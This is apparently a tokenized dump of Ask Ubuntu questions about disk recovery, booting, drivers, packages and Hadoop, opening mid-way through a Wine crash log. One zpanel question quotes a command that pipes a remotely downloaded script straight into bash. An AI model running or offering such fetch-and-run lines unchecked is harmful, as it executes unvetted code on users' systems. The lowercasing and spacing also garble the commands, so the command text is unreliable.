dwarf < wine-loader > elf 7d687000-7d6bd000 deferred uxtheme < elf > \-pe 7d690000-7d6bd000 \ uxtheme elf 7d6bd000-7d6c3000 deferred libxfixes.so.3 elf 7d6c3000-7d6ce000 deferred libxcursor.so.1 elf 7d6ce000-7d6df000 deferred libxi.so.6 elf 7d6df000-7d6e3000 deferred libxcomposite.so.1 elf 7d6e3000-7d6ee000 deferred libxrandr.so.2 elf 7d6ee000-7d6f9000 deferred libxrender.so.1 elf 7d6f9000-7d6ff000 deferred libxxf86vm.so.1 elf 7d6ff000-7d703000 deferred libxinerama.so.1 elf 7d703000-7d70a000 deferred libxdmcp.so.6 elf 7d70a000-7d70e000 deferred libxau.so.6 elf 7d70e000-7d72f000 deferred libxcb.so.1 elf 7d72f000-7d864000 deferred libx11.so.6 elf 7d864000-7d877000 deferred libxext.so.6 elf 7d8a0000-7d932000 deferred winex11 < elf > \-pe 7d8b0000-7d932000 \ winex11 elf 7d98d000-7d9b6000 deferred libexpat.so.1 elf 7d9b6000-7d9f0000 deferred libfontconfig.so.1 elf 7d9f0000-7da8f000 deferred libfreetype.so.6 elf 7dab8000-7dadd000 deferred imm32 < elf > \-pe 7dac0000-7dadd000 \ imm32 elf 7dadd000-7daf2000 deferred faultrep < elf > \-pe 7dae0000-7daf2000 \ faultrep elf 7daf2000-7db2a000 deferred msvcr100 < elf > \-pe 7db00000-7db2a000 \ msvcr100 elf 7db2a000-7db57000 deferred msvcr90 < elf > \-pe 7db30000-7db57000 \ msvcr90 elf 7db57000-7dbff000 deferred msvcrt < elf > \-pe 7db70000-7dbff000 \ msvcrt elf 7dbff000-7dd3c000 deferred msvcp90 < elf > \-pe 7dc40000-7dd3c000 \ msvcp90 elf 7dd3c000-7de71000 deferred oleaut32 < elf > \-pe 7dd50000-7de71000 \ oleaut32 elf 7de71000-7de9c000 deferred msacm32 < elf > \-pe 7de80000-7de9c000 \ msacm32 elf 7de9c000-7df56000 deferred winmm < elf > \-pe 7dea0000-7df56000 \ winmm elf 7df56000-7df6a000 deferred psapi < elf > \-pe 7df60000-7df6a000 \ psapi elf 7df6a000-7df84000 deferred libz.so.1 elf 7df96000-7dfad000 deferred powrprof < elf > \-pe 7dfa0000-7dfad000 \ powrprof elf 7dfad000-7e015000 deferred dbghelp < elf > \-pe 7dfb0000-7e015000 \ dbghelp elf 7e015000-7e03b000 deferred iphlpapi < elf > \-pe 7e020000-7e03b000 \ iphlpapi elf 7e03b000-7e071000 deferred ws2_32 < elf > \-pe 7e040000-7e071000 \ ws2_32 elf 7e071000-7e08d000 deferred wsock32 < elf > \-pe 7e080000-7e08d000 \ wsock32 elf 7e08d000-7e18a000 deferred opengl32 < elf > \-pe 7e0b0000-7e18a000 \ opengl32 elf 7e18a000-7e2ca000 deferred wined3d < elf > \-pe 7e1a0000-7e2ca000 \ wined3d elf 7e2ca000-7e307000 deferred d3d9 < elf > \-pe 7e2d0000-7e307000 \ d3d9 elf 7e307000-7e378000 deferred setupapi < elf > \-pe 7e310000-7e378000 \ setupapi elf 7e378000-7e3fa000 deferred rpcrt4 < elf > \-pe 7e380000-7e3fa000 \ rpcrt4 elf 7e3fa000-7e537000 deferred ole32 < elf > \-pe 7e410000-7e537000 \ ole32 elf 7e537000-7e553000 deferred dinput8 < elf > \-pe 7e540000-7e553000 \ dinput8 elf 7e553000-7e65a000 deferred comctl32 < elf > \-pe 7e560000-7e65a000 \ comctl32 elf 7e65a000-7e777000 deferred gdi32 < elf > \-pe 7e670000-7e777000 \ gdi32 elf 7e777000-7e8d1000 dwarf user32 < elf > \-pe 7e790000-7e8d1000 \ user32 elf 7e8d1000-7e94b000 deferred shlwapi < elf > \-pe 7e8e0000-7e94b000 \ shlwapi elf 7e94b000-7eb7e000 deferred shell32 < elf > \-pe 7e960000-7eb7e000 \ shell32 elf 7eb7e000-7ebf0000 deferred advapi32 < elf > \-pe 7eb90000-7ebf0000 \ advapi32 elf 7ebf0000-7ebfd000 deferred libnss_files.so.2 elf 7ebfd000-7ec09000 deferred libnss_nis.so.2 elf 7ec09000-7ec22000 deferred libnsl.so.1 elf 7ef94000-7efd7000 deferred libm.so.6 elf 7efe6000-7f000000 deferred version < elf > \-pe 7eff0000-7f000000 \ version elf f3b3d000-f3b88000 deferred dinput < elf > \-pe f3b40000-f3b88000 \ dinput elf f3b88000-f3bd1000 deferred dsound < elf > \-pe f3b90000-f3bd1000 \ dsound elf f3bd1000-f3be8000 deferred libresolv.so.2 elf f3be8000-f3bf1000 deferred libogg.so.0 elf f3bf1000-f3c1d000 deferred libvorbis.so.0 elf f3c1d000-f3d95000 deferred libvorbisenc.so.2 elf f3d95000-f3dc9000 deferred libflac.so.8 elf f3dc9000-f3e3b000 deferred libsndfile.so.1 elf f3e3b000-f3e86000 deferred libdbus-1.so.3 elf f3e86000-f3ef5000 deferred libpulsecommon-4.0.so elf f3ef5000-f3f44000 deferred libpulse.so.0 elf f3f6d000-f3fe2000 deferred ddraw < elf > \-pe f3f70000-f3fe2000 \ ddraw elf f46e5000-f46ef000 deferred libwrap.so.0 elf f46ef000-f46fa000 deferred libjson-c.so.2 elf f46fa000-f4722000 deferred winepulse < elf > \-pe f4700000-f4722000 \ winepulse elf f48ce000-f4934000 deferred libatiadlxx.so elf f4934000-f6de7000 deferred fglrx_dri.so elf f6de7000-f6ed7000 deferred libgl.so.1 elf f6ed7000-f6ede000 deferred libasyncns.so.0 elf f6ede000-f6f00000 deferred mmdevapi < elf > \-pe f6ee0000-f6f00000 \ mmdevapi elf f700a000-f7023000 deferred libatiuki.so.1 elf f7023000-f7047000 deferred gameux < elf > \-pe f7030000-f7047000 \ gameux elf f708d000-f70ac000 deferred libp11-kit.so.0 elf f70ac000-f70be000 deferred libtasn1.so.3 elf f70be000-f7142000 deferred libgcrypt.so.11 elf f7142000-f7208000 deferred libgnutls.so.26 elf f720b000-f7214000 deferred librt.so.1 elf f7214000-f7231000 deferred libgcc_s.so.1 elf f7231000-f725e000 deferred netapi32 < elf > \-pe f7240000-f725e000 \ netapi32 elf f725e000-f7291000 deferred secur32 < elf > \-pe f7260000-f7291000 \ secur32 elf f7291000-f7360000 deferred crypt32 < elf > \-pe f72a0000-f7360000 \ crypt32 elf f736b000-f751f000 dwarf libc.so.6 elf f751f000-f7524000 deferred libdl.so.2 elf f7525000-f7540000 deferred libpthread.so.0 elf f7541000-f7546000 deferred libgpg-error.so.0 elf f7546000-f7560000 deferred imagehlp < elf > \-pe f7550000-f7560000 \ imagehlp elf f7560000-f7569000 deferred libnss_compat.so.2 elf f7569000-f771e000 dwarf libwine.so.1 elf f7720000-f7742000 deferred ld-linux.so.2 elf f7742000-f7743000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 0000001f 0 0000001e 0 00000014 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001d 0 0000001a 0 00000017 0 00000013 0 0000001b plugplay.exe 00000021 0 00000020 0 0000001c 0 00000022 explorer.exe 00000024 0 00000023 0 00000025 steam.exe 00000077 0 00000064 2 0000000d 0 00000038 0 0000000b 0 00000047 0 00000046 0 00000045 0 00000044 0 00000043 0 00000042 0 00000041 0 00000040 0 0000003f 0 0000003e 15 0000003d 0 0000003c 0 0000003a 0 00000039 2 00000037 0 00000036 0 00000035 0 00000034 0 00000033 0 00000032 0 00000031 0 00000030 0 0000002f 0 0000002e 0 0000002d 0 0000002c 0 0000002b 0 0000002a 0 00000026 0 0000004c ( d ) c : \program files\steam\steamapps\common\dishonored\binaries\win32\dishonored.exe 00000076 -1 00000049 2 0000004b 2 00000027 2 00000028 0 00000029 0 00000063 0 00000062 0 00000061 0 00000060 1 0000005f 15 0000005e 0 0000005d 0 0000005c 0 0000005b 15 0000005a 0 00000059 1 00000057 0 00000054 0 00000053 0 00000052 0 00000051 0 00000050 0 0000004f 0 0000004e 0 0000004d 0 < == 00000066 gameoverlayui.exe 00000071 0 0000006b 0 0000006a 0 00000069 0 00000068 0 00000058 0 00000056 0 00000055 0 00000009 0 00000048 0 0000004a 0 00000067 0 system information : wine build : wine-1.6.1 platform : i386 host system : linux host version : 3.11.0-15-generic ubuntu 13.10 64-bit kernel 3.11.0-15-generic cpu 8 x intel core i7-2600k @ 3.40ghz ram 31.4 gib amd radeon hd 7970 | driver version 13.10 ( propriety driver from additional drivers ) | ccc version 2.18
430165	disk failure , fsck not doing anything	note : this started off as a question but while i was typing i tried different things and eventually got it working . i still wanted to post it in case it can help anyone else problem : crashed disk , cant be mounted . my guess is that bad usb in my pc or the cable caused this crash . os : ubuntu 12.04 disk : external raid 5 array `` 4 bay soho raid '' , about 3 months old partition : sde1 , ext4 , 8.2tb disk manager shows disk and partition , including type and other info . smart data shows `` self-tests : completed ok '' and `` overall assessment : disk is healthy '' . /etc/fstab uuid=9540030a-323d-483f-8fdc-20dbaa09bcaf /mnt/data ext4 defaults , async , errors=remount-ro 0 0 mount -a wrong fs type , bad option , bad superblock on /dev/sde1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so lsblk name maj : min rm size ro type mountpoint sde 8:64 0 8.2t 0 disk ââsde1 8:65 0 8.2t 0 part fdisk /dev/sde -l warning : gpt ( guid partition table ) detected on '/dev/sde ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sde : 9001.6 gb , 9001613918208 bytes 255 heads , 63 sectors/track , 1094383 cylinders , total 17581277184 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sde1 1 4294967295 2147483647+ ee gpt sfdisk -l /dev/sde warning : gpt ( guid partition table ) detected on '/dev/sde ' ! the util sfdisk does n't support gpt . use gnu parted . disk /dev/sde : 1094383 cylinders , 255 heads , 63 sectors/track units = cylinders of 8225280 bytes , blocks of 1024 bytes , counting from 0 device boot start end # cyls # blocks id system /dev/sde1 0+ 267349- 267350- 2147483647+ ee gpt start : ( c , h , s ) expected ( 0,0,2 ) found ( 0,0,1 ) /dev/sde2 0 - 0 0 0 empty /dev/sde3 0 - 0 0 0 empty /dev/sde4 0 - 0 0 0 empty dmesg | tail [ 9605.609668 ] buffer i/o error on device sdd1 , logical block 17578328274 [ 9605.609671 ] buffer i/o error on device sdd1 , logical block 17578328275 [ 9605.609673 ] buffer i/o error on device sdd1 , logical block 17578328276 [ 9605.609676 ] buffer i/o error on device sdd1 , logical block 17578328277 [ 9605.609678 ] buffer i/o error on device sdd1 , logical block 17578328278 [ 9605.609681 ] buffer i/o error on device sdd1 , logical block 17578328279 [ 9605.670459 ] buffer i/o error on device sdd1 , logical block 17578328152 [ 9605.670466 ] buffer i/o error on device sdd1 , logical block 17578328153 [ 9806.549854 ] ext4-fs ( sde1 ) : ext4_check_descriptors : checksum for group 0 failed ( 59348 ! =46035 ) [ 9806.549859 ] ext4-fs ( sde1 ) : group descriptors corrupted ! parted /dev/sde gnu parted 2.3 using /dev/sde welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) unit tb ( parted ) print model : hzw raid 5 ( scsi ) disk /dev/sde : 9.00tb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 0.00tb 9.00tb 9.00tb ext4 fsck -cfdy /dev/sde1 *note : i ran this a total of 4 times , it seemed like the errors were repeating and fsck wasnt actually doing anything but there were slight differences between each run . also in duration , the first 2 took hours , the last 2 an hour or less . this is the description of the last run it made : lots of this : ( in all 4 runs ) group descriptor xxxxx checksum is invalid . fixed . then about an hour of this ( first 2 runs many hours , last 2 about an hour ) pass 1 : checking inodes , blocks , and sizes then these 2 in a few seconds pass 2 : checking directory structure pass 3 : checking directory connectivity a few minutes on pass 3a : optimising directories with a a bunch of these around the 98 % mark free blocks count wrong for group # 59104 ( 28640 , counted=28617 ) . fix ? yes in the earlier runs i got very different error messages here , it was asking if i wanted to ignore an issue , if i entered `` no '' then fsck just quite . if i entered yes then i got another question to which i answered yes . i got thousands of these so i just put a weight on my [ enter ] key and left it to it ( took quite a while ) . after the last run i got data : ***** file system was modified ***** data : 716082/274710528 files ( 2.4 % non-contiguous ) , 1193918074/2197659639 blocks ** sudo mount -a** the disk was mounted but no directories or files were visible . it did say `` available space '' 3.8gb which would be about correct but i couldnt see the files that should have been there taking up the rest of the space . it wass dark data ! ( it 's there and can be observed by the space it takes up , but you cant see it directly ) . ** sudo umount /mnt/data** fdisk -l disk /dev/sde : 9001.6 gb , 9001613918208 bytes 255 heads , 63 sectors/track , 1094383 cylinders , total 17581277184 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sde1 1 4294967295 2147483647+ ee gpt ** sudo mount -a** ah ! finally : d the disk is mounted and i can see directories again . no idea why it worked this time but im not complaining ! i see 2 lost+found directories , one with a prefixed `` . '' . but both seem empty . i decided to run a compare against my backup . rsync -rvnc -- delete [ mounteddir ] [ backupdir ] and , to be sure , i also ran sudo diff -qr [ mounteddir ] [ backupdir ] took a while to run these but it seems everything is as it should be : )
430167	how to disable usb storage device support	i want to disable a particular usb storage device ( a sandisk flash drive ) . i read somewhere that you can use the .config file . how do i use it to disable that ?
430170	help with booting from a usb flash drive	yesterday i downloaded the 12.04 iso and unetbootin and attempted to boot from my brand new 16gb flash drive . that did n't work so i made a livedvd which works fine , the only problem is my laptop 's dvd drive is broken ( i tested the dvd on a desktop ) . so a few hours ago i downloaded a new iso through unetbootin ( as opposed to on the ubuntu website ) and attempted to boot from that with no success . i have tried removing my hard drive and made sure the flash drive was first on the boot list . each time i get a `` missing operating system '' message and am forced to shut down . might there be something i 'm missing or should i consider a usb dvd drive ?
430171	why i ca n't get the tty 's ?	so i just installed ubuntu minimal with gdm and openbox and i can boot into openbox just fine , but i obviously need to install other packages which i can do from just the blank openbox de . i know that you can press alt + f1 after grub to open to cli , but it only stays up for a second and then it just continues onto gdm and i can ' do anything . any ideas ?
430177	ubuntu restricted extras ... help a noob !	ubuntu noob here , so be gentle . after a few mishaps , i 've finally got ubuntu set up and doing good on my desktop . during the installation , i thought i had checked the tab to install restricted extras during installation . ( still think i did ) anyway , i just figured out the extras can be loaded from the ubuntu software center , which i clicked on to check it out . it was showing as needing installed , so i clicked on install and a warning box popped up that said : to install ubuntu restricted extras , these items must be removed : libav codec library - libavcodec53 libav utility library - libavutil51 with the options to `` cancel '' or `` install anyway '' what should i do ? if i install anyway , will it overwrite those items with something else or will i screw something up ? thanks for any and all help !
430182	help needed in installing ubuntu 13.10 ?	please kindly give the solution to install ubuntu 13.10 in my laptop ? pc name : hp pavilion 15 notebook ( n011tx ) notebook pc problem : after full installation of ubuntu 13.10 when i boot to the ubuntu 13.10 operating system suddenly it shows a alert `` your system is running in low graphics '' after this the shell prompt will be displayed please kindly help to get desktop environment of ubuntu 13.10 else please give steps to install ubuntu 13.10 on stated pc/laptop or please tell which version of ubuntu will suite for my pc/laptop
430183	want to completely install ubuntu as only os but dont know what happens to files	i would like to know how to get my files ( music , videos , etc.. ) to be on ubuntu when i get rid of windows os . from reading this site i get the impression that if i completely use ubuntu as my os and use my entire drive for this but i would like to keep my files as well . a friend recommended me to use linux since windows is turning crap . i would appreciate advice on how to accomplish this .
430184	software updates without password request ?	i use ubuntu 13.10 and every time the automatic updater finds updates , i click install and it never asks me for the password . i mean it asked me for the password at first update , and a few times after that , but now it installs the updates without asking me for the password . is it normal ?
430187	error on building noweb from source	i 'm trying to build noweb from source code but i get an error about /bin/sh : notangle : command not found make [ 1 ] : ** [ nwprocess.h ] error 127 from noweb 's faq i found : q . the build fails because it ca n't find notangle . what am i doing wrong ? a . your source files have the wrong timestamps . the noweb files are carefully distributed so that the c code is more recent than the literate source code . retrieving that noweb distribution as a compressed tar file preserves these stamps . the ctan sites will create a compressed tar file on the fly for any directory . your best bet is to get the tar file , unpack it , and try again , because your abortive attempt will probably have stomped on a c file that you need . so , i did it . downloaded this version extacted to a directory but i get same error . how to fix this ?
430188	hfs ownership on usb ehdd	i no longer have a imac , i am using ubuntu 12.04 , my ehd has two partitions on it . the first is 1.8 tb , the second is about 200gb . the larger partition is hfs format , the smaller is fat . i am trying to back up all information so i can wipe the drive and place items back in usual place ... unfortunately , with almost every folder , an error pops up stating i do n't have permissions for certain files , skip , retry ? those are the most important files ! i have no internet access on my laptop as well
430189	can ubuntu run without internet ?	i have already installed ubuntu on my laptop and i want to ask if ubuntu can still run without internet.. thanks !
430191	installation of ubunthu 12 with koha	i am not an it profession but would like to install ubunthu with koha 3 . is there anyone who can guide me through either through video tutorial or step-by-step manual ?
430194	no such file or directory when executing /usr/bin/time	i 'm building my own android rom . in order to build it , i need to run mka -j8 bacon however , i wanted to measure the time it took to build it , so i used /usr/bin/time -f `` user\t % u\nsys\t % s\nreal\t % e\ncpu\t % p '' mka -j8 bacon this wo n't run , because it 's saying /usr/bin/time : can not run mka : no such file or directory any help how to work around this , it 's appreciated ! i 'm running xubuntu . edit : for some reason , using make instead of mka does work , however using mka is better . /usr/bin/time -f `` user\t % u\nsys\t % s\nreal\t % e\ncpu\t % p '' make -j8 bacon edit 2 : from the cyanogenmod website invoking $ source build/envsetup.sh or $ . build/envsetup.sh from your shell runs the envsetup.sh script in the build directory . envsetup.sh adds many functions to the build environment , the most important of which are listed below . source build/evnsetup.sh is the command i run before executing time . one of those added functions by evnsetup.sh is mka , is it possible to call this from within the time command ? edit 3 : output of type mka $ type mka mka is a function mka ( ) { case `uname -s` in darwin ) make -j `sysctl hw.ncpu|cut -d '' `` -f2` `` $ @ '' ; ; * ) schedtool -b -n 1 -e ionice -n 1 make -j $ ( cat /proc/cpuinfo | grep `` ^processor '' | wc -l ) `` $ @ '' ; ; esac }
430196	how to pass arguments to functions while executing a python script from terminal ?	i have a python file named solution.py and i can successfully execute it through the terminal using the following commands : chmod +x solution.py python3 solution.py this works just fine if i have simple print phrases and so on . what should i do if i have defined a function in solution.py and i want to call it with parameters that i want directly from terminal ? how do i pass the arguments to the function call ?
430199	how to install eiffel on ubuntu 13.10 ?	how can i install the eiffel programming language ? i run ubuntu 13.10 ( 64-bit ) but i do n't have a window manager , only ssh ( as ec2 instance ) .
430207	ca n't run 3d apps/games when i switch from discrete to embeded graphics	i have ubuntu 12.04 and i have switchable graphics . intel hd graphics 4000 and amd radeon hd 8730m the problem is this , when i have discrete graphics enabled ( amd ) everything works fine , but the heat goes up even tho i have the prop drivers . and when i switch to embeded ( intel ) nothing that uses 3d stuff works , by running a few games i got the error/info that something is wrong with xorg server . any ideas ? thanks in advance .
430209	error while installing kernel-headers ?	i have a linux kernel module which i am trying to compile . the module needs the installed kernel headers to install and is looking into /lib/modules/ $ uname -r/build folder which is not present . i have a linux machine with kernel release version ( uname -r result ) 2.6.32-042stab076.8 so i am trying to install the header using sudo apt-get install kernel-headers- $ ( uname -r ) but getting this error e : unable to locate package kernel-headers-2.6.32-042stab076.8 e : could n't find any package by regex 'kernel-headers-2.6.32-042stab076.8' i read some where that support to this kernel version is dropped and the only way i can proceed further is by upgrading my os or re-installing the os . is it correct or i can work around some other way . thanks
430211	ubuntu server : start dropbox.py of a user without logign in	i have an ubuntu server 12.04 . user x logins rarely , but i would like to keep his dropbox folder updated . how can i accomplish that dropbox of user x service starts at boot/reboot without the user x requiring to login ( to start the service ) ? the server is command line only . no gui .
430212	asking support for 13.04 , upgradation of 13.04	sir/madam i am using ubuntu 13.04 . some says that 13.04 has no longer supporting . in this i have lot of data in my system . more over that am using dual os . so please solve my problem that is how to upgrade ubuntu 13.04 os .
430213	question from a newbie	i installed ubuntu yesterday , so this is a very new and unique experience for me . naturally , i want to know how does installation work here ? in windows , exe files are opened and installation boots up ; here , however deb files exit which have to be opened through its respective software - which i do not know . so , could anyone explain how installation of a non-ubuntu software centre [ usc ] program goes ?
430218	how can i get my current location/coordinates by ip from the command line ?	it seems like there is a package called geoclue which uses mozilla 's location service to lookup wireless access points and their known location , but there does n't seem to be a command line interface for this . is there another way to do it ? any clever hacks ?
430221	ubuntu stuck in login loop and ttys not working	i installed ubuntu 13.10 in dual boot successfully , but after having updated my nvidia driver with apt-get , i can no longer sign in into my account , and after each authentification , the login screen is returning the same login screen . and the worst is that i 'm unable to open vitual terminal with ctrl-alt-f1 to solve the problem in commend line as described here . simply because all ttys ( ctrl-alt-f [ 1-6 ] ) are nor working anymore . i was thinking if the problem might be solved using grub command or something , but i have no idea how to proceed .
430224	setting power profile on radeo driver	i am trying to change the power profile on my ati mobility radeon hd 4530 in order to prevent overheating . i 'm following instructions which say to do the following : sudo sh -c `` echo profile > /sys/class/drm/card0/device/power_method '' sudo sh -c `` echo mid > /sys/class/drm/card0/device/power_profile `` however when i try and run this i get the following error sh : 1 : can not create /sys/class/drm/card0/device/power_method : directory nonexistent how can i change the power profile so my laptop does n't overheat ?
430225	connect to symbian hotspot with ubuntu	i am sharing my phone internet via joiku spot premium on symbian belle . it works until i use encryption . i am connecting to network ( generated by phone ) with my ubuntu laptop . when i use encryption it connects , but ping doesn`t work . where should be a problem ? joiku spot settings : network name : mynetwork access point : myinternetinphone 802.11 channel : 1 encryption : wep shared encryption key type : ascii encryption key lenght : 128 encryption key : mykey12345678 gateway ip adress : 192.168.2.1 ubuntu wifi settings : ssid : mynetwork mode : ad-hoc band : automatic channel : default security : wep 40/128-bit key ( hex or ascii ) key : mykey12345678
430229	how can i undo a recently closed tab in nautilus ?	most browsers have a 'undo closed tab ' which will reopen a closed tab in case you closed it by mistake . for firefox , it 's ctrl+shift+t . can i replicate this behaviour in nautilus and how ? i looked at nautilus shortcuts but could n't find a shortcut for that . assume you have a deeply nested folder thats open in a tab in nautilus , then as you go to select it , you accidentally close it . now to reopen the tab , you will have to manually track it down under multiple other folders . am looking for a shortcut ( not necessarily keyboard ) to restore the tab in the current open nautilus .
430230	gnome menu broken ?	i think my applications menu ( the top right in gnome fallback ) is broken or something . i was messing around with menulibre and after i closed it , an additional `` system tools '' menu appeared above accessories containing a `` folder '' only containing synaptic ( the menu item i was changing ) . after closing menulibre , alacarte and menulibre no longer open . i 've tried apt-get purge menulibre alacarte and re-installing them , but nothing happened . does anyone know how to fix my menu so i can edit it ? thanks ! additional infomation : i 'm running ubuntu trusty 14.04 development as of 6 march 2014 with gnome fallback , and after upgrading to trusty , my menus have been `` reset '' , ie everything is normal apart from any shortcuts i 've added which have been moved to other . when i open alacarte in terminal i get this : ** ( alacarte:32703 ) : warning ** : could n't register with accessibility bus : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . ( alacarte:32703 ) : gtk-critical ** : gtk_accel_label_set_accel_closure : assertion 'gtk_accel_group_from_accel_closure ( accel_closure ) ! = null ' failed ( alacarte:32703 ) : gtk-critical ** : gtk_accel_label_set_accel_closure : assertion 'gtk_accel_group_from_accel_closure ( accel_closure ) ! = null ' failed ** error : /build/buildd/gnome-menus-3.10.1/./libmenu/gmenu-tree.c:4022 : preprocess_layout_info : assertion failed : ( ! directory- > preprocessed ) aborted when i open menulibre in terminal i get this : warning : menulibre : getdefaultmenuprefix ( ) 'no menu prefix found , menulibre will not function properly . ' ** error : /build/buildd/gnome-menus-3.10.1/./libmenu/gmenu-tree.c:4022 : preprocess_layout_info : assertion failed : ( ! directory- > preprocessed ) aborted
430231	how to install zpanel 10.1.1 for ubuntu server 12.04 lts	all related questions for zpanel installation are outdated and those links are not working so i am posting new question this is zpanel github link . it have installed ubuntu server on amazon ec2 , and in above link there are installation command but when i tried running that it is not working . i have curl installed , it is fresh installation of ubuntu with no modules installed before as instructed on zpanel website . for zpanel installation below is command they gave for ubuntu 12.04 os . but its now working or i am doing it wrong most probably . bash < ( curl -ss https : //raw.github.com/zpanel/installers/master/install/ubuntu-12_04/10_1_1.sh ) totally new to ubuntu that 's why not getting this , how to install using above command .
430233	basic bash printing question	i know this question is basic knowing how to write script , but i did n't learn that yet : i have a program that takes , as an input , a list like : str_1 , str_2 , etc . the string is always the same , but the numbers go from 1 to 1,000 . obviously , it is not possible to write this manually , so i want to generate the argument str_1 , str_2 , etc automatically and then copy it to the shell ( or , if there is a better way to do , please let me know ) . how can i generate this list ?
430234	libipq not supported in ubuntu 12.04 lts	i have the requirement of altering packets as a part of my university 's research project and came across two libraries . which are libnetfilter_queue and libipq which is the deprecated version . libnetfilter_queue documentation is next to zero on packet alteration and the only good documentation i came across is done via libipq . thus , when i run my code i get the error passer : unable to create netlink socket : protocol not supported which i found out that is due to the fact that libipq is not supported in the new linux kernels . my query is , is there a work around to make libipq work with ubuntu 12.04 lts or any reference to documentation or tutorials that would help implement packet alteration via libnetfilter_queue . i was at this for some days and could not find solution . you help will be very much appreciated . : ) thank you very much : )
430235	repository location	i 've recently updated to a development version of trusty , and it disabled all the ppas i 've added . i have quite a lot of ppas , but when i enable it in synaptic , it automatically scrolls to the top , so i need to scroll down again just to enable another repo . i 've searched around and apparently the repositories are in /etc/apt/sources.list , but when i looked there , there are only a few of my added repos there . does anyone know where the rest of the ppas are located . thanks !
430238	ip adress is 10.0.2.15 and need to acces via browser	for school i have to set up an ubuntu server , i have no clue what to do so i found a guide which i can follow . the problem is that on the video he gets a normal ip-adress and can acces it with his browser , but i am getting a private ip adress and i have no clue how to change it . the ip-adress i get is 10.0.2.15. edit : it is a server in virtualmachine
430247	which packages should be installed on ubuntu server so it will be able to play video ?	i have a server where ubuntu server 12.04 is installed . it 's used for running automated browser tests . the tests use firefox that is run in xvfb . one of tests clicks button that usually invokes playing html5 video . however , video is n't played . i think it 's because ubuntu server lacks packages that are needed for playing video that are present on ubuntu desktop by default . which packages should i install to be able to play video ? the content-type of the video is video/mp4 , an extension of the file is .mp4
430250	need help to install a mfc-7340	i need help installing my brother mfc-7340 driver on my 12.04 ubuntu computer . i need a tutorial of how to install it so i can print things via wireless . any help is appreciated , thanks
430252	how do i manually remove malformed packages ?	i tried to install typo3 via the apt-get package manager on ubuntu 13.10 saucy . during the installation the package typo3-dummy could not be configured and remained in status : half-installed sudo dpkg -- purge -- force-all typo3-dummy ( reading database ... 107326 files and directories currently installed . ) removing typo3-dummy ... apache2-maintscript-helper invoked from a modified environment . please hint required arguments manually dpkg : error processing typo3-dummy ( -- purge ) : subprocess installed post-removal script returned error exit status 1 processing triggers for ureadahead ... errors were encountered while processing : typo3-dummy what else could i try to get rid of this package ? i 'd like to avoid fresh installation . ty edit : using sudo apt-get install -f returns the following output ben @ cloudy : /etc $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : typo3-dummy 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 484 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 107326 files and directories currently installed . ) removing typo3-dummy ... apache2-maintscript-helper invoked from a modified environment . please hint requ ired arguments manually dpkg : error processing typo3-dummy ( -- remove ) : subprocess installed post-removal script returned error exit status 1 processing triggers for ureadahead ... no apport report written because maxreports is reached already errors were encoun tered while processing : typo3-dummy e : sub-process /usr/bin/dpkg returned an error code ( 1 )
430253	can i run ubuntu on my htc 8s windows phone ?	can i run ubuntu on my htc 8s windows phone ? the phones specifications are 512 ram with a qualcomm snapdragon s4 dual-core 1 ghz krait if it can run on my phone instructions on how to do it will be very much appreciated .
430255	how to use hadoop streaming input parameter for matlab shell script	actually i want to execute my matlab code in hadoop streaming . my doubt is how to use hadoop streaming input parameter value for my matlab input . for example , this is my matlab file imreadtest.m ( simple coding ) rgbimage = imread ( '/usr/new.jpg ' ) ; imwrite ( rgbimage , '/usr/ot/testedimage1.jpg ' ) ; my shell script is ! /bin/sh matlabbg imreadtest.m -nodisplay normally this works well in my ubuntu . ( not in hadoop ) . i have stored these two files in my hdfs using hue . now my matlab script looks like ( imrtest.m ) rgbimage = imread ( stdin ) ; imwrite ( rgbimage , stdout ) ; my shell script is ( imrtest.sh ) . ! /bin/sh matlabbg imrtest.m -nodisplay i have tried to execute this in hadoop streaming hadoop @ xxx : /usr/local/master/hadoop $ $ hadoop_home/bin/hadoop jar $ hadoop_home/hadoop-streaming.jar -mapper /usr/ot/imrtest.sh -file /usr/ot/imrtest.sh -input /usr/ot/testedimage.jpg -output /usr/ot/opt but i got error like this packagejobjar : [ /usr/ot/imrtest.sh , /usr/local/master/temp/hadoop- unjar4018041785380098978/ ] [ ] /tmp/streamjob7077345699332124679.jar tmpdir=null 14/03/06 15:51:41 warn snappy.loadsnappy : snappy native library is available 14/03/06 15:51:41 info util.nativecodeloader : loaded the native-hadoop library 14/03/06 15:51:41 info snappy.loadsnappy : snappy native library loaded 14/03/06 15:51:41 info mapred.fileinputformat : total input paths to process : 1 14/03/06 15:51:42 info streaming.streamjob : getlocaldirs ( ) : [ /usr/local/master/temp/mapred/local ] 14/03/06 15:51:42 info streaming.streamjob : running job : job_201403061205_0015 14/03/06 15:51:42 info streaming.streamjob : to kill this job , run : 14/03/06 15:51:42 info streaming.streamjob : /usr/local/master/hadoop/bin/hadoop job -dmapred.job.tracker=slave3:8021 -kill job_201403061205_0015 14/03/06 15:51:42 info streaming.streamjob : 14/03/06 15:51:43 info streaming.streamjob : map 0 % reduce 0 % 14/03/06 15:52:15 info streaming.streamjob : map 100 % reduce 100 % 14/03/06 15:52:15 info streaming.streamjob : to kill this job , run : 14/03/06 15:52:15 info streaming.streamjob : /usr/local/master/hadoop/bin/hadoop job -dmapred.job.tracker=slave3:8021 -kill job_201403061205_0015 14/03/06 15:52:15 info streaming.streamjob : 14/03/06 15:52:15 error streaming.streamjob : job not successful . error : na 14/03/06 15:52:15 info streaming.streamjob : killjob ... streaming command failed ! 